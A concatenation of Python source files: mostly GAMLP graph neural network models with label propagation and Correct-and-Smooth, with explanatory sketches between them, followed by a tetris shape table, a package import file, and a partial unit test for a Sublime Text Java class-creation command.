            self.lr_att = nn.Linear(nfeat + hidden, 1)
            self.lr_output = FeedForwardNetII(
                nfeat, hidden, nclass, n_layers_2, dropout, alpha, bns)
        self.dropout = nn.Dropout(dropout)
        self.input_drop = nn.Dropout(input_drop)
        self.att_drop = nn.Dropout(att_dropout)
        self.pre_process = pre_process
        self.res_fc = nn.Linear(nfeat, hidden)
        if act == 'sigmoid':
            self.act = torch.nn.Sigmoid()
        elif act == 'relu':
            self.act = torch.nn.ReLU()
        elif act == 'leaky_relu':
            self.act = torch.nn.LeakyReLU(0.2)
        self.residual = residual
        self.reset_parameters()

    def reset_parameters(self):
        gain = nn.init.calculate_gain("relu")
        nn.init.xavier_uniform_(self.lr_att.weight, gain=gain)
        nn.init.zeros_(self.lr_att.bias)
        nn.init.xavier_uniform_(self.res_fc.weight, gain=gain)
        nn.init.zeros_(self.res_fc.bias)
        self.lr_output.reset_parameters()
        self.lr_jk_ref.reset_parameters()
        if self.pre_process:
            for layer in self.process:
                layer.reset_parameters()

    def forward(self, feature_list):
        num_node = feature_list[0].shape[0]
        feature_list = [self.input_drop(feature) for feature in feature_list]
        input_list = []
        if self.pre_process:
            for i in range(len(feature_list)):
                input_list.append(self.process[i](feature_list[i]))
        else:
            input_list = feature_list
        # Jumping-knowledge reference built from all hops at once
        concat_features = torch.cat(input_list, dim=1)
        jk_ref = self.dropout(self.prelu(self.lr_jk_ref(concat_features)))
        attention_scores = [
            self.act(self.lr_att(
                torch.cat((jk_ref, x), dim=1))).view(num_node, 1)
            for x in input_list]
        W = torch.cat(attention_scores, dim=1)
        W = F.softmax(W, dim=1)
        right_1 = torch.mul(input_list[0], self.att_drop(
            W[:, 0].view(num_node, 1)))
        for i in range(1, self.num_hops):
            right_1 = right_1 + torch.mul(input_list[i], self.att_drop(
                W[:, i].view(num_node, 1)))
        if self.residual:
            right_1 += self.res_fc(feature_list[0])
            right_1 = self.dropout(self.prelu(right_1))
        if self.pre_dropout:
            right_1 = self.dropout(right_1)
        right_1 = self.lr_output(right_1)
        return right_1
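Where R_GAMLP scores hops recursively, JK_GAMLP builds one "jumping knowledge" reference vector from the concatenation of all hops and scores each hop against it. A pure-Python sketch for a single node with scalar hop features, where `ref_fn` stands in for `lr_jk_ref` and `score_fn` for `lr_att` (both illustrative placeholders, not the real learned layers):

```python
import math

def softmax(xs):
    m = max(xs)
    exps = [math.exp(x - m) for x in xs]
    s = sum(exps)
    return [e / s for e in exps]

def jk_attention(hops, ref_fn, score_fn):
    """hops: per-hop scalar features for one node."""
    ref = ref_fn(hops)                                  # jumping-knowledge reference
    w = softmax([score_fn(ref, h) for h in hops])       # one score per hop
    return sum(wi * h for wi, h in zip(w, hops))        # weighted combination

out = jk_attention(
    [1.0, 2.0, 4.0],
    ref_fn=lambda hs: sum(hs) / len(hs),                # toy reference: mean of hops
    score_fn=lambda r, h: -abs(r - h),                  # toy score: closeness to reference
)
```

Unlike the recursive variant, every hop sees the same reference, so the attention weights can be computed in one pass.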
class JK_GAMLP_RLU(nn.Module):
    def __init__(self, nfeat, hidden, nclass, num_hops,
                 dropout, input_drop, att_dropout, label_drop, alpha,
                 n_layers_1, n_layers_2, n_layers_3, act, pre_process=False,
                 residual=False, pre_dropout=False, bns=False):
        super(JK_GAMLP_RLU, self).__init__()
        self.num_hops = num_hops
        self.pre_dropout = pre_dropout
        self.prelu = nn.PReLU()
        self.res_fc = nn.Linear(nfeat, hidden, bias=False)
        if pre_process:
            self.lr_jk_ref = FeedForwardNetII(
                num_hops * hidden, hidden, hidden, n_layers_1, dropout,
                alpha, bns)
            self.lr_att = nn.Linear(hidden + hidden, 1)
            self.lr_output = FeedForwardNetII(
                hidden, hidden, nclass, n_layers_2, dropout, alpha, bns)
            self.process = nn.ModuleList(
                [FeedForwardNet(nfeat, hidden, hidden, 2, dropout, bns)
                 for _ in range(num_hops)])
        else:
            self.lr_jk_ref = FeedForwardNetII(
                num_hops * nfeat, hidden, hidden, n_layers_1, dropout,
                alpha, bns)
            self.lr_att = nn.Linear(nfeat + hidden, 1)
            self.lr_output = FeedForwardNetII(
                nfeat, hidden, nclass, n_layers_2, dropout, alpha, bns)
        self.dropout = nn.Dropout(dropout)
        self.input_drop = nn.Dropout(input_drop)
        self.att_drop = nn.Dropout(att_dropout)
        self.label_drop = nn.Dropout(label_drop)
        self.pre_process = pre_process
        self.label_fc = FeedForwardNet(
            nclass, hidden, nclass, n_layers_3, dropout)
        if act == 'sigmoid':
            self.act = torch.nn.Sigmoid()
        elif act == 'relu':
            self.act = torch.nn.ReLU()
        elif act == 'leaky_relu':
            self.act = torch.nn.LeakyReLU(0.2)
        self.residual = residual
        # keep initialization consistent with the other GAMLP variants
        self.reset_parameters()

    def reset_parameters(self):
        gain = nn.init.calculate_gain("relu")
        nn.init.xavier_uniform_(self.lr_att.weight, gain=gain)
        nn.init.zeros_(self.lr_att.bias)
        nn.init.xavier_uniform_(self.res_fc.weight, gain=gain)
        nn.init.zeros_(self.res_fc.bias)
        self.lr_output.reset_parameters()
        self.lr_jk_ref.reset_parameters()
        if self.pre_process:
            for layer in self.process:
                layer.reset_parameters()

    def forward(self, feature_list, label_emb):
        num_node = feature_list[0].shape[0]
        feature_list = [self.input_drop(feature) for feature in feature_list]
        input_list = []
        if self.pre_process:
            for i in range(len(feature_list)):
                input_list.append(self.process[i](feature_list[i]))
        else:
            # without pre-processing, use the hop features directly
            input_list = feature_list
        concat_features = torch.cat(input_list, dim=1)
        jk_ref = self.dropout(self.prelu(self.lr_jk_ref(concat_features)))
        attention_scores = [
            self.act(self.lr_att(
                torch.cat((jk_ref, x), dim=1))).view(num_node, 1)
            for x in input_list]
        W = torch.cat(attention_scores, dim=1)
        W = F.softmax(W, dim=1)
        right_1 = torch.mul(input_list[0], self.att_drop(
            W[:, 0].view(num_node, 1)))
        for i in range(1, self.num_hops):
            right_1 = right_1 + torch.mul(input_list[i], self.att_drop(
                W[:, i].view(num_node, 1)))
        if self.residual:
            right_1 += self.res_fc(feature_list[0])
            right_1 = self.dropout(self.prelu(right_1))
        if self.pre_dropout:
            right_1 = self.dropout(right_1)
        right_1 = self.lr_output(right_1)
        right_1 += self.label_fc(self.label_drop(label_emb))
        return right_1
class R_GAMLP_RLU(nn.Module):  # recursive GAMLP
    def __init__(self, nfeat, hidden, nclass, num_hops,
                 dropout, input_drop, att_dropout, label_drop, alpha,
                 n_layers_1, n_layers_2, n_layers_3, act, pre_process=False,
                 residual=False, pre_dropout=False, bns=False):
        super(R_GAMLP_RLU, self).__init__()
        self.num_hops = num_hops
        self.pre_dropout = pre_dropout
        self.prelu = nn.PReLU()
        if pre_process:
            self.lr_att = nn.Linear(hidden + hidden, 1)
            self.lr_output = FeedForwardNetII(
                hidden, hidden, nclass, n_layers_2, dropout, alpha, bns)
            self.process = nn.ModuleList(
                [FeedForwardNet(nfeat, hidden, hidden, 2, dropout, bns)
                 for _ in range(num_hops)])
        else:
            self.lr_att = nn.Linear(nfeat + nfeat, 1)
            self.lr_output = FeedForwardNetII(
                nfeat, hidden, nclass, n_layers_2, dropout, alpha, bns)
        self.dropout = nn.Dropout(dropout)
        self.input_drop = nn.Dropout(input_drop)
        self.att_drop = nn.Dropout(att_dropout)
        self.pre_process = pre_process
        self.res_fc = nn.Linear(nfeat, hidden)
        self.label_drop = nn.Dropout(label_drop)
        self.residual = residual
        self.label_fc = FeedForwardNet(
            nclass, hidden, nclass, n_layers_3, dropout)
        if act == 'sigmoid':
            self.act = torch.nn.Sigmoid()
        elif act == 'relu':
            self.act = torch.nn.ReLU()
        elif act == 'leaky_relu':
            self.act = torch.nn.LeakyReLU(0.2)
        self.reset_parameters()

    def reset_parameters(self):
        gain = nn.init.calculate_gain("relu")
        nn.init.xavier_uniform_(self.lr_att.weight, gain=gain)
        nn.init.zeros_(self.lr_att.bias)
        nn.init.xavier_uniform_(self.res_fc.weight, gain=gain)
        nn.init.zeros_(self.res_fc.bias)
        self.lr_output.reset_parameters()
        if self.pre_process:
            for layer in self.process:
                layer.reset_parameters()

    def forward(self, feature_list, label_emb):
        num_node = feature_list[0].shape[0]
        feature_list = [self.input_drop(feature) for feature in feature_list]
        input_list = []
        if self.pre_process:
            for i in range(self.num_hops):
                input_list.append(self.process[i](feature_list[i]))
        else:
            input_list = feature_list
        attention_scores = []
        attention_scores.append(self.act(self.lr_att(
            torch.cat([input_list[0], input_list[0]], dim=1))))
        for i in range(1, self.num_hops):
            history_att = torch.cat(attention_scores[:i], dim=1)
            att = F.softmax(history_att, dim=1)
            history = torch.mul(input_list[0], self.att_drop(
                att[:, 0].view(num_node, 1)))
            for j in range(1, i):
                history = history + torch.mul(input_list[j], self.att_drop(
                    att[:, j].view(num_node, 1)))
            attention_scores.append(self.act(self.lr_att(
                torch.cat([history, input_list[i]], dim=1))))
        attention_scores = torch.cat(attention_scores, dim=1)
        attention_scores = F.softmax(attention_scores, dim=1)
        right_1 = torch.mul(input_list[0], self.att_drop(
            attention_scores[:, 0].view(num_node, 1)))
        for i in range(1, self.num_hops):
            right_1 = right_1 + torch.mul(input_list[i], self.att_drop(
                attention_scores[:, i].view(num_node, 1)))
        if self.residual:
            right_1 += self.res_fc(feature_list[0])
            right_1 = self.dropout(self.prelu(right_1))
        if self.pre_dropout:
            right_1 = self.dropout(right_1)
        right_1 = self.lr_output(right_1)
        right_1 += self.label_fc(self.label_drop(label_emb))
        return right_1
# adapted from https://github.com/facebookresearch/NARS/blob/main/model.py
class WeightedAggregator(nn.Module):
    def __init__(self, num_feats, in_feats, num_hops):
        super(WeightedAggregator, self).__init__()
        self.agg_feats = nn.ParameterList()
        for _ in range(num_hops):
            self.agg_feats.append(nn.Parameter(
                torch.Tensor(num_feats, in_feats)))
            nn.init.xavier_uniform_(self.agg_feats[-1])

    def forward(self, feat_list):  # feat_list: k tensors of shape (N, S, D)
        new_feats = []
        for feats, weight in zip(feat_list, self.agg_feats):
            new_feats.append(
                (feats * weight.unsqueeze(0)).sum(dim=1).squeeze())
        return new_feats
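Per hop, the aggregator mixes the features coming from `S` relation subsets into one feature per node: an `(N, S, D)` tensor is multiplied elementwise by an `(S, D)` weight and summed over the subset axis. A pure-Python sketch of that contraction with nested lists (names here are illustrative, not the NARS API):

```python
def weighted_aggregate(feats, weight):
    """feats: N x S x D (per-node features from S relation subsets),
    weight: S x D mixing weights; returns N x D."""
    N, S, D = len(feats), len(weight), len(weight[0])
    out = []
    for n in range(N):
        # sum over the S relation subsets, independently per feature dim
        row = [sum(feats[n][s][d] * weight[s][d] for s in range(S))
               for d in range(D)]
        out.append(row)
    return out

# two nodes, two subsets, D = 2, uniform 0.5 weights -> subset average
feats = [[[1.0, 0.0], [0.0, 1.0]],
         [[2.0, 2.0], [1.0, 1.0]]]
weight = [[0.5, 0.5], [0.5, 0.5]]
agg = weighted_aggregate(feats, weight)  # [[0.5, 0.5], [1.5, 1.5]]
```

In the module above this runs once per hop, with a separate learned weight per hop.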
class NARS_JK_GAMLP(nn.Module):
    def __init__(self, nfeat, hidden, nclass, num_hops, num_feats, alpha,
                 n_layers_1, n_layers_2, n_layers_3, act="relu", dropout=0.5,
                 input_drop=0.0, attn_drop=0.0, label_drop=0.0,
                 pre_process=False, residual=False, pre_dropout=False,
                 bns=False):
        super(NARS_JK_GAMLP, self).__init__()
        self.aggregator = WeightedAggregator(num_feats, nfeat, num_hops)
        self.model = JK_GAMLP(nfeat, hidden, nclass, num_hops, dropout,
                              input_drop, attn_drop, alpha, n_layers_1,
                              n_layers_2, act, pre_process, residual,
                              pre_dropout, bns)

    def forward(self, feats_dict, label_emb=None):
        feats = self.aggregator(feats_dict)
        # JK_GAMLP does not consume label information
        return self.model(feats)


class NARS_R_GAMLP(nn.Module):
    def __init__(self, nfeat, hidden, nclass, num_hops, num_feats, alpha,
                 n_layers_1, n_layers_2, n_layers_3, act="relu", dropout=0.5,
                 input_drop=0.0, attn_drop=0.0, label_drop=0.0,
                 pre_process=False, residual=False, pre_dropout=False,
                 bns=False):
        super(NARS_R_GAMLP, self).__init__()
        self.aggregator = WeightedAggregator(num_feats, nfeat, num_hops)
        self.model = R_GAMLP(nfeat, hidden, nclass, num_hops, dropout,
                             input_drop, attn_drop, alpha, n_layers_1,
                             n_layers_2, act, pre_process, residual,
                             pre_dropout, bns)

    def forward(self, feats_dict, label_emb=None):
        feats = self.aggregator(feats_dict)
        # R_GAMLP does not consume label information
        return self.model(feats)


class NARS_JK_GAMLP_RLU(nn.Module):
    def __init__(self, nfeat, hidden, nclass, num_hops, num_feats, alpha,
                 n_layers_1, n_layers_2, n_layers_3, act="relu", dropout=0.5,
                 input_drop=0.0, attn_drop=0.0, label_drop=0.0,
                 pre_process=False, residual=False, pre_dropout=False,
                 bns=False):
        super(NARS_JK_GAMLP_RLU, self).__init__()
        self.aggregator = WeightedAggregator(num_feats, nfeat, num_hops)
        self.model = JK_GAMLP_RLU(nfeat, hidden, nclass, num_hops, dropout,
                                  input_drop, attn_drop, label_drop, alpha,
                                  n_layers_1, n_layers_2, n_layers_3, act,
                                  pre_process, residual, pre_dropout, bns)

    def forward(self, feats_dict, label_emb):
        feats = self.aggregator(feats_dict)
        return self.model(feats, label_emb)


class NARS_R_GAMLP_RLU(nn.Module):
    def __init__(self, nfeat, hidden, nclass, num_hops, num_feats, alpha,
                 n_layers_1, n_layers_2, n_layers_3, act="relu", dropout=0.5,
                 input_drop=0.0, attn_drop=0.0, label_drop=0.0,
                 pre_process=False, residual=False, pre_dropout=False,
                 bns=False):
        super(NARS_R_GAMLP_RLU, self).__init__()
        self.aggregator = WeightedAggregator(num_feats, nfeat, num_hops)
        self.model = R_GAMLP_RLU(nfeat, hidden, nclass, num_hops, dropout,
                                 input_drop, attn_drop, label_drop, alpha,
                                 n_layers_1, n_layers_2, n_layers_3, act,
                                 pre_process, residual, pre_dropout, bns)

    def forward(self, feats_dict, label_emb):
        feats = self.aggregator(feats_dict)
        return self.model(feats, label_emb)
class MLPLinear(nn.Module):
    def __init__(self, in_dim, out_dim):
        super(MLPLinear, self).__init__()
        self.linear = nn.Linear(in_dim, out_dim)
        self.reset_parameters()

    def reset_parameters(self):
        self.linear.reset_parameters()

    def forward(self, x):
        return F.log_softmax(self.linear(x), dim=-1)


class MLP(nn.Module):
    def __init__(self, in_dim, hid_dim, out_dim, num_layers, dropout=0.):
        super(MLP, self).__init__()
        assert num_layers >= 2
        self.linears = nn.ModuleList()
        self.bns = nn.ModuleList()
        self.linears.append(nn.Linear(in_dim, hid_dim))
        self.bns.append(nn.BatchNorm1d(hid_dim))
        for _ in range(num_layers - 2):
            self.linears.append(nn.Linear(hid_dim, hid_dim))
            self.bns.append(nn.BatchNorm1d(hid_dim))
        self.linears.append(nn.Linear(hid_dim, out_dim))
        self.dropout = dropout
        self.reset_parameters()

    def reset_parameters(self):
        for layer in self.linears:
            layer.reset_parameters()
        for layer in self.bns:
            layer.reset_parameters()

    def forward(self, x):
        for linear, bn in zip(self.linears[:-1], self.bns):
            x = linear(x)
            x = F.relu(x, inplace=True)
            x = bn(x)
            x = F.dropout(x, p=self.dropout, training=self.training)
        x = self.linears[-1](x)
        return F.log_softmax(x, dim=-1)
class LabelPropagation(nn.Module):
    r"""
    Description
    -----------
    Introduced in `Learning from Labeled and Unlabeled Data with Label
    Propagation <https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.14.3864&rep=rep1&type=pdf>`_

    .. math::
        \mathbf{Y}^{\prime} = \alpha \cdot \mathbf{D}^{-1/2} \mathbf{A}
        \mathbf{D}^{-1/2} \mathbf{Y} + (1 - \alpha) \mathbf{Y},

    where labels on unlabeled nodes are inferred from labeled nodes via
    propagation.

    Parameters
    ----------
    num_layers: int
        The number of propagation steps.
    alpha: float
        The :math:`\alpha` coefficient.
    adj: str
        'DAD': D^-0.5 * A * D^-0.5
        'DA': D^-1 * A
        'AD': A * D^-1
    """

    def __init__(self, num_layers, alpha, adj='DAD'):
        super(LabelPropagation, self).__init__()
        self.num_layers = num_layers
        self.alpha = alpha
        self.adj = adj

    @torch.no_grad()
    def forward(self, g, labels, mask=None,
                post_step=lambda y: y.clamp_(0., 1.)):
        with g.local_scope():
            if labels.dtype == torch.long:
                labels = F.one_hot(labels.view(-1)).to(torch.float32)
            y = labels
            if mask is not None:
                y = torch.zeros_like(labels)
                y[mask] = labels[mask]
            last = (1 - self.alpha) * y
            degs = g.in_degrees().float().clamp(min=1)
            norm = torch.pow(
                degs, -0.5 if self.adj == 'DAD' else -1
            ).to(labels.device).unsqueeze(1)
            for _ in range(self.num_layers):
                # Assume the graph to be undirected
                if self.adj in ['DAD', 'AD']:
                    y = norm * y
                g.ndata['h'] = y
                g.update_all(fn.copy_u('h', 'm'), fn.sum('m', 'h'))
                y = self.alpha * g.ndata.pop('h')
                if self.adj in ['DAD', 'DA']:
                    y = y * norm
                y = post_step(last + y)
            return y
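The propagation loop above uses DGL message passing; the same update is easy to state with a dense adjacency matrix. Below is a minimal pure-Python sketch of the 'DAD' variant on a tiny graph, assuming symmetric adjacency and one-hot seed labels (zero rows for unlabeled nodes); it is a toy for intuition, not a replacement for the sparse DGL version.

```python
def label_propagation(adj, y0, alpha, num_layers):
    """adj: dense symmetric adjacency (list of lists), y0: N x C seed labels."""
    n, c = len(adj), len(y0[0])
    deg = [max(sum(row), 1) for row in adj]
    inv_sqrt = [d ** -0.5 for d in deg]
    y = [row[:] for row in y0]
    last = [[(1 - alpha) * v for v in row] for row in y0]   # fixed seed term
    for _ in range(num_layers):
        # y <- clamp(last + alpha * D^-1/2 A D^-1/2 y)
        prop = [[inv_sqrt[i] * sum(adj[i][j] * inv_sqrt[j] * y[j][k]
                                   for j in range(n))
                 for k in range(c)] for i in range(n)]
        y = [[min(max(last[i][k] + alpha * prop[i][k], 0.0), 1.0)
              for k in range(c)] for i in range(n)]
    return y

# path graph 0-1-2; node 0 seeded class 0, node 2 seeded class 1
adj = [[0, 1, 0], [1, 0, 1], [0, 1, 0]]
y0 = [[1.0, 0.0], [0.0, 0.0], [0.0, 1.0]]
y = label_propagation(adj, y0, alpha=0.9, num_layers=10)
```

By symmetry the middle node ends up torn evenly between the two classes, while each endpoint keeps a bias toward its own seed label.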
class CorrectAndSmooth(nn.Module):
    r"""
    Description
    -----------
    Introduced in `Combining Label Propagation and Simple Models
    Out-performs Graph Neural Networks <https://arxiv.org/abs/2010.13993>`_

    Parameters
    ----------
    num_correction_layers: int
        The number of correction propagation steps.
    correction_alpha: float
        The coefficient of correction.
    correction_adj: str
        'DAD': D^-0.5 * A * D^-0.5
        'DA': D^-1 * A
        'AD': A * D^-1
    num_smoothing_layers: int
        The number of smoothing propagation steps.
    smoothing_alpha: float
        The coefficient of smoothing.
    smoothing_adj: str
        'DAD': D^-0.5 * A * D^-0.5
        'DA': D^-1 * A
        'AD': A * D^-1
    autoscale: bool, optional
        If set to True, will automatically determine the scaling factor
        :math:`\sigma`. Default is True.
    scale: float, optional
        The scaling factor :math:`\sigma`, in case :obj:`autoscale = False`.
        Default is 1.
    """

    def __init__(self,
                 num_correction_layers,
                 correction_alpha,
                 correction_adj,
                 num_smoothing_layers,
                 smoothing_alpha,
                 smoothing_adj,
                 autoscale=True,
                 scale=1.):
        super(CorrectAndSmooth, self).__init__()
        self.autoscale = autoscale
        self.scale = scale
        self.prop1 = LabelPropagation(num_correction_layers,
                                      correction_alpha,
                                      correction_adj)
        self.prop2 = LabelPropagation(num_smoothing_layers,
                                      smoothing_alpha,
                                      smoothing_adj)

    def correct(self, g, y_soft, y_true, mask):
        with g.local_scope():
            assert abs(float(y_soft.sum()) / y_soft.size(0) - 1.0) < 1e-2
            numel = (int(mask.sum()) if mask.dtype == torch.bool
                     else mask.size(0))
            assert y_true.size(0) == numel
            if y_true.dtype == torch.long:
                y_true = F.one_hot(
                    y_true.view(-1), y_soft.size(-1)).to(y_soft.dtype)
            error = torch.zeros_like(y_soft)
            error[mask] = y_true - y_soft[mask]
            if self.autoscale:
                smoothed_error = self.prop1(
                    g, error, post_step=lambda x: x.clamp_(-1., 1.))
                sigma = error[mask].abs().sum() / numel
                scale = sigma / smoothed_error.abs().sum(dim=1, keepdim=True)
                scale[scale.isinf() | (scale > 1000)] = 1.0
                result = y_soft + scale * smoothed_error
                result[result.isnan()] = y_soft[result.isnan()]
                return result
            else:
                def fix_input(x):
                    x[mask] = error[mask]
                    return x

                smoothed_error = self.prop1(g, error, post_step=fix_input)
                result = y_soft + self.scale * smoothed_error
                result[result.isnan()] = y_soft[result.isnan()]
                return result

    def smooth(self, g, y_soft, y_true, mask):
        with g.local_scope():
            numel = (int(mask.sum()) if mask.dtype == torch.bool
                     else mask.size(0))
            assert y_true.size(0) == numel
            if y_true.dtype == torch.long:
                y_true = F.one_hot(
                    y_true.view(-1), y_soft.size(-1)).to(y_soft.dtype)
            y_soft[mask] = y_true
            return self.prop2(g, y_soft)
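The "correct" step boils down to: compute the prediction error on the training nodes, smooth that residual over the graph, and add it back to the soft predictions. A minimal pure-Python sketch with an injectable `propagate` operator (illustrative names; the real module uses `LabelPropagation` and an optional autoscale factor, omitted here):

```python
def correct(y_soft, y_true_onehot, train_mask, propagate, scale=1.0):
    """Residual-correction step of Correct & Smooth.
    propagate: any smoothing operator over per-node vectors."""
    n, c = len(y_soft), len(y_soft[0])
    error = [[0.0] * c for _ in range(n)]
    for i in range(n):
        if train_mask[i]:
            # residual is only known on training nodes
            error[i] = [t - s for t, s in zip(y_true_onehot[i], y_soft[i])]
    smoothed = propagate(error)
    return [[s + scale * e for s, e in zip(y_soft[i], smoothed[i])]
            for i in range(n)]

# with identity propagation, only the training node gets corrected
y = correct(
    y_soft=[[0.6, 0.4], [0.5, 0.5]],
    y_true_onehot=[[1.0, 0.0], [0.0, 0.0]],
    train_mask=[True, False],
    propagate=lambda e: e,
)
```

With a real propagation operator, the residual also leaks to neighboring test nodes, which is the whole point of the correction step.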


# --- tetris/tetris_graph.py (huodahaha/tetris_python, MIT) ---
# -*- coding: utf-8 -*-
# Collision table: a 4x4 occupancy mask for each of the seven tetrominoes
graph = [None] * 7  # storage for the seven shape masks
graph[0] = [[0, 0, 0, 0], [0, 1, 0, 0], [0, 1, 1, 1], [0, 0, 0, 0]]
graph[1] = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 1, 0, 0], [1, 1, 1, 0]]
graph[2] = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 1, 0], [1, 1, 1, 0]]
graph[3] = [[0, 0, 0, 0], [0, 0, 0, 0], [1, 1, 0, 0], [1, 1, 0, 0]]
graph[4] = [[0, 0, 0, 0], [0, 0, 0, 0], [1, 1, 0, 0], [0, 1, 1, 0]]
graph[5] = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 1, 1, 0], [1, 1, 0, 0]]
graph[6] = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [1, 1, 1, 1]]
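A collision table like this is typically consumed by an overlap test between two 4x4 occupancy masks. The helper below is a hypothetical illustration of that use, not part of the tetris repo:

```python
def overlaps(mask_a, mask_b):
    """True if two 4x4 occupancy masks share at least one filled cell."""
    return any(a and b
               for row_a, row_b in zip(mask_a, mask_b)
               for a, b in zip(row_a, row_b))

# sample masks matching the table's conventions (bottom-aligned shapes)
i_mask = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [1, 1, 1, 1]]
o_mask = [[0, 0, 0, 0], [0, 0, 0, 0], [1, 1, 0, 0], [1, 1, 0, 0]]
```

Both sample masks fill the bottom-left corner, so they would collide if dropped into the same 4x4 window.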


# --- datasets/preprocess/__init__.py (Renovamen/Text-Classification, MIT) ---
from .utils import get_clean_text
from .document import run_prepro as run_doc_prepro
from .sentence import run_prepro as run_sent_prepro

# --- tests/commands/test_create.py (evandrocoan/Javatar, MIT) ---
import sublime
import unittest
from unittest.mock import patch, MagicMock
from Javatar.commands.creates import (
    JavatarCreateCommand,
    JavatarCreatePackageCommand
)
class TestCreateClass(unittest.TestCase):
    @patch(
        "sublime.Window.folders",
        return_value=[]
    )
    @patch(
        "sublime.Window.active_view",
        return_value=None
    )
    def test_parse_create_invalid_location(self, *_):
        window = MagicMock(spec=sublime.Window)
        cmd = JavatarCreateCommand(window)
        tests = [
            "", "~", ":", "<", ":<", "<:", "alpha.", ".alpha", ".alpha.",
            "alpha.bravo.", ".alpha.bravo", ".alpha.bravo.", ":charlie",
            "<charlie", ":charlie,delta", "<charlie,delta"
        ]
        for test in tests:
            self.assertEqual(
                cmd.parse_create(test),
                "Cannot specify package location"
            )
            self.assertEqual(
                cmd.parse_create("~" + test),
                "Cannot specify package location"
            )
    @patch(
        "Javatar.core.state_property._StateProperty.is_project",
        return_value=True
    )
    @patch(
        "Javatar.core.state_property._StateProperty.get_source_folder",
        return_value="alpha"
    )
    @patch(
        "Javatar.core.state_property._StateProperty.get_dir",
        return_value="alpha/bravo"
    )
    def test_parse_create_invalid_name(self, *_):
        window = MagicMock(spec=sublime.Window)
        cmd = JavatarCreateCommand(window)
        tests = [
            "", "~", ":", "<", ":<", "<:", "alpha.", ".alpha", ".alpha.",
            "alpha.bravo.", ".alpha.bravo", ".alpha.bravo.", ":charlie",
            "<charlie", ":charlie,delta", "<charlie,delta"
        ]
        for test in tests:
            self.assertEqual(
                cmd.parse_create(test),
                "Invalid class naming"
            )
            self.assertEqual(
                cmd.parse_create("~" + test),
                "Invalid class naming"
            )
    @patch(
        "Javatar.core.state_property._StateProperty.is_project",
        return_value=True
    )
    @patch(
        "Javatar.core.state_property._StateProperty.get_source_folder",
        return_value="alpha"
    )
    @patch(
        "Javatar.core.state_property._StateProperty.get_dir",
        return_value="alpha/bravo"
    )
    def test_parse_create(self, *_):
        window = MagicMock(spec=sublime.Window)
        cmd = JavatarCreateCommand(window)
        tests = [
            {
                "input": "Alpha",
                "expected": {
                    "relative_path": True,
                    "class_name": "Alpha",
                    "package": "bravo",
                    "as_main": False,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/bravo/",
                    "file": "alpha/bravo/Alpha.java"
                }
            }, {
                "input": "Alpha.Bravo",
                "expected": {
                    "relative_path": True,
                    "class_name": "Bravo",
                    "package": "bravo.Alpha",
                    "as_main": False,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/bravo/Alpha",
                    "file": "alpha/bravo/Alpha/Bravo.java"
                }
            }, {
                "input": "Alpha.Bravo.Charlie",
                "expected": {
                    "relative_path": True,
                    "class_name": "Charlie",
                    "package": "bravo.Alpha.Bravo",
                    "as_main": False,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/bravo/Alpha/Bravo",
                    "file": "alpha/bravo/Alpha/Bravo/Charlie.java"
                }
            }, {
                "input": "Alpha.Bravo.CharlieAsMain",
                "expected": {
                    "relative_path": True,
                    "class_name": "Charlie",
                    "package": "bravo.Alpha.Bravo",
                    "as_main": True,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/bravo/Alpha/Bravo",
                    "file": "alpha/bravo/Alpha/Bravo/Charlie.java"
                }
            }, {
                "input": "Alpha.Bravo.privateCharlieAsMain",
                "expected": {
                    "relative_path": True,
                    "class_name": "Charlie",
                    "package": "bravo.Alpha.Bravo",
                    "as_main": True,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "private",
                    "modifier_keyword": "",
                    "directory": "alpha/bravo/Alpha/Bravo",
                    "file": "alpha/bravo/Alpha/Bravo/Charlie.java"
                }
            }, {
                "input": "Alpha.Bravo.abstractCharlieAsMain",
                "expected": {
                    "relative_path": True,
                    "class_name": "Charlie",
                    "package": "bravo.Alpha.Bravo",
                    "as_main": True,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "abstract",
                    "directory": "alpha/bravo/Alpha/Bravo",
                    "file": "alpha/bravo/Alpha/Bravo/Charlie.java"
                }
            }, {
                "input": "Alpha.Bravo.ProtectedFinalCharlieAsMain",
                "expected": {
                    "relative_path": True,
                    "class_name": "Charlie",
                    "package": "bravo.Alpha.Bravo",
                    "as_main": True,
                    "extends": [],
                    "implements": [],
                    "visibility_keyword": "protected",
                    "modifier_keyword": "final",
                    "directory": "alpha/bravo/Alpha/Bravo",
                    "file": "alpha/bravo/Alpha/Bravo/Charlie.java"
                }
            }, {
                "input": "Alpha.Bravo:Charlie",
                "expected": {
                    "relative_path": True,
                    "class_name": "Bravo",
                    "package": "bravo.Alpha",
                    "as_main": False,
                    "extends": ["Charlie"],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/bravo/Alpha",
                    "file": "alpha/bravo/Alpha/Bravo.java"
                }
            }, {
                "input": "Alpha.Bravo:Charlie,Delta",
                "expected": {
                    "relative_path": True,
                    "class_name": "Bravo",
                    "package": "bravo.Alpha",
                    "as_main": False,
                    "extends": ["Charlie", "Delta"],
                    "implements": [],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/bravo/Alpha",
                    "file": "alpha/bravo/Alpha/Bravo.java"
                }
            }, {
                "input": "Alpha.Bravo<Charlie,Delta",
                "expected": {
                    "relative_path": True,
                    "class_name": "Bravo",
                    "package": "bravo.Alpha",
                    "as_main": False,
                    "extends": [],
                    "implements": ["Charlie", "Delta"],
                    "visibility_keyword": "public",
                    "modifier_keyword": "",
                    "directory": "alpha/bravo/Alpha",
                    "file": "alpha/bravo/Alpha/Bravo.java"
                }
            }, {
                "input": "Alpha.Bravo:Charlie<Delta",
                "expected": {
                    "relative_path": True,
                    "class_name": "Bravo",
